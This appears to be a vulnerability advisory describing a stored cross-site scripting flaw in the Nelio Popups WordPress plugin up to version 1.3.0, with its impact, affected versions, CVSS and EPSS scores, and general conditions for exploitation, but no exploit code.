Nelio Software’s Nelio Popups plugin implements a stored cross‑site scripting (XSS) flaw due to improper neutralization of input during web page generation. The vulnerability allows an attacker to embed malicious JavaScript that is persisted in the plugin’s database. When the affected content is rendered, the injected code executes in the browsers of site visitors, enabling session hijacking, credential theft, defacement, or execution of further malicious payloads. This weakness falls under CWE‑79. The impact is confined to confidentiality, integrity, and availability of web users who view the compromised pages. The description does not explicitly state the required conditions for exploitation, so it is inferred that an attacker must supply or modify content accepted by the plugin’s storage paths.

WordPress sites that have installed the Nelio Popups plugin for any version up through 1.3.0 are vulnerable. Vendors and products affected are Nelio Software’s Nelio Popups. The affected version range is from an undefined earliest release through 1.3.0, inclusive. Any instance of the plugin within that range, regardless of the WordPress version, can be impacted.

The CVSS score of 6.5 indicates moderate severity, while the EPSS score of less than 1% reflects a low but non‑zero probability of actual exploitation. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities catalog, reducing its perceived immediacy but still posing a notable risk. Exploitation requires that the attacker insert malicious content into the plugin’s storage system—typically via the user‑interface that accepts popup or form data—so that the stored script is later rendered in a normal page view. Once the script is executed, an attacker can perform client‑side attacks directed at any visitor of the site.